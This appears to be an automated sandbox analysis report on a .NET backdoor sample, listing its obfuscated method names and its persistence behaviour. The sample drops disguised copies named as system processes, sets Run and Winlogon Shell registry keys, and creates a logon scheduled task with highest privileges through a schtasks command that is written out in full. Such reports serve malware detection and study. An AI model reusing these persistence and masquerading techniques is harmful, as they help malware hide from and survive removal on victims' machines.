                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, aTyydwA62jtRQR5olI5.csHigh entropy of concatenated method names: 'EdyD29H9oQ', 'wZSD1VLR3O', 'y72DyKJhNA', 'vbdDJTqA1C', 'St3DjK8YPx', 'LsuFuh72wXddlFZS3w7', 'EOLZvh7Ag6GrVap7FLt', 'InTORj7rGuk4yF20x8K', 'cfKbY67hjwulwv5c5bt', 'Kvtm7A7ijhSQlGhsPhl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, rY6Nepj5ZPCXPNrSare.csHigh entropy of concatenated method names: '_6GH8g', 'qDV8p', '_6WhTf', 'cp2GpsQvvm', '_1Kw16', 'qY8k8', '_1Y29k', 'B271Y', '_8m283', '_43N1B'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, ftopJGJ1ppVr79n0Efx.csHigh entropy of concatenated method names: 'LPxQSxZOim', 'AqfLAfclV7a0IbU0bwH', 'cIZHKScxdm02RCa3XXw', 'H1YcxUcWadMnHu4ZOin', 'U7hYTWc9PXLq7TlPUAh', 'bvEu9Oc45jFGiFnyZ7u', 'VlNLsUcoaZUCJNjmwcl', 'lpc8HbcQt0Nv31MS4df', 'qmL9ivcj8KIZ9a6iJeS', 'V3nnPncCF2kVu2KiBpc'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JI1yXq6M4CtMce966nF.csHigh entropy of concatenated method names: 'XvCmeUCa9k', 'ljqmxsOUJ7', 'J12UvBhD60unoVoN2Jg', 'fb10eUhT2wnFUKq31Rh', 'rvhDr5hXDnLGMADxqQ9', 'Y6JWEHhBxoyfmY6pEFk', 'ualoldhuFbW7nhJBxHf', 'jfDuY9hGuuasGwXiXKH', 'nAXvPjhbpM2ojed5f01', 'UBsls3hrM0nuExkZn6S'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, VtuN5UXrw2EOUdP7ZRS.csHigh entropy of concatenated method names: 'QdJ19', 'lzo13', 'C836T', '_279mE', 'Me7sn', '_4f3qD', '_7Sz4L', '_62Ph5', '_4X4vQ', '_4AS9R'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, BLfsiMCf3Tu33H6atI.csHigh entropy of concatenated method names: 'D9Om5cMdydSYOhlT42x', 'zPAg7tMFjaWylXqDbUy', 'YXPEgdMEeF3ot6fFU18', 'XocNaFMcTWgccNMqjuy', 'CAHcllMe7KduFoyxMeU', 'i1wa5iMVl6GhJ9g31Y8', 'tPkNkdMWuOLwawCbBHM', 'TmxXSMM9oY60WMho0Fi', 'aN1cTfMl51QGQY6aPOX', 'r2uLytMxoUr1CbosV5L'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, u4aQ6gpnTIlVd3sU1Bk.csHigh entropy of concatenated method names: 'OQgwFmvB1yBuuEJpSgp', 'qDoEqKvuLDoIbU4OpYv', 'ujtB9svGukMQGKQUXdp', 'ROoDBwvbya4kkaMU5L6', 'Vj0fulvr62qmpS0wR12', 'bVEcERvh7cGqb0seLOo', 'SJaB5Ov2omulXTB8NQO', 'Y9AX32vARg3ghQvQeOf', 'Vuv2olviTxL6GSdFM9f', 'do5OgqvKRym6d77waVk'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, bHrGAKjN9pBd5IBSIMK.csHigh entropy of concatenated method names: 'WFQE8Ys2S9', 'ST2EnibUdl', '_67WmM', 'm9LEHJ42Kl', 'gnVEW94wf5', 'yhtEOiH56G', 'jc5EYaREOS', 'z1D1OtJdEmvow5AsqlL', 'nSrKLtJFe9L9ITuGggS', 'WhFqmUJEGZRQcUq1wet'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, mNw1SmphLinP6DdtkDF.csHigh entropy of concatenated method names: 'Yax8IgDBVdpOQdY3LQI', 'UVcKyvDuTF1Ji9FgfcU', 'isx9fIDGgoCyrOB3T1I', 'qqRo8iDb4tNAdxdiXKf', 'wMqDR1Dr05gixIawn1q', 'ygO6gjDhQME7vyRnNA4', 'W7HUjmDTClwYN0ClRUS', 'NNv6bRDXRxIOlly3H2e'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, yWdxewpDXWndfyssTx0.csHigh entropy of concatenated method names: 'PdKNnbXKhL8pFdk1Cgb', 'Cw2QqJX77JsUPYa83gY', 'KlJQb0X34kU16NkZRoc', 'gM57RQXtvxcAFbQvaue', 'sQ8SSKXOLNsh2IRAOB2', 'tbRsGZXYL6aNBPlRBxJ', 'F3F4RQXdkS9AgWDdFTg', 'VCuFc7XFm0P1nK25xTU', 'gCE8PKXEwoptJBISgNG', 'WqESulXA5edfs5KQZ2h'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JSNyubnze1kgf4601GJ.csHigh entropy of concatenated method names: 'P2pDWBmQS1UBRi2C8bK', 'PsUGHpmjX1D6aXKEtsu', 'tPYtUwm4QW3phGBm0Xg', 'ziBxMhmo8R19DUwHpDc', 'LlXpI1UF3h', 'Ty4aBdmHEpXkKamOGRV', 'YTmMogm8kO4DvMWPPJc', 'F3nfMZmpMk4uij0MFwR', 'nO1I1EmNgyIwvH419uQ', 'x5yRHsmgphbd0TmgA5x'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, VD6rKOpReI971P3wXkH.csHigh entropy of concatenated method names: 'btRbdDDnqBsg3CbLX5o', 'CL8xVCDJX0pVHK7MPwm', 'MC4C9FDsrCkwn2jckof', 'SdkX94DkqphjC4Q1w2Z', 'TjIrpODLn3IULX2eHtH', 'GnA93sDSvk8aFIsXENa', 'PK8iFyDmBdNe4UR3ZkA', 'e2kkwaDZC14vbgf8mG4', 'P3FetSDaWYvmAOGJGLy'

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeFile written: C:\Users\user\AppData\Roaming\Adobe\hui.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeFile created: C:\PerfLogs\KQihinlofznONtA.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeFile created: C:\PerfLogs\WmiPrvSE.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJump to dropped file
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeFile created: C:\Users\user\AppData\Roaming\Adobe\hui.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtAJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KQihinlofznONtA" /sc ONLOGON /tr "'C:\PerfLogs\KQihinlofznONtA.exe'" /rl HIGHEST /f
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtAJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtAJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtAJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtAJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\PerfLogs\KQihinlofznONtA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
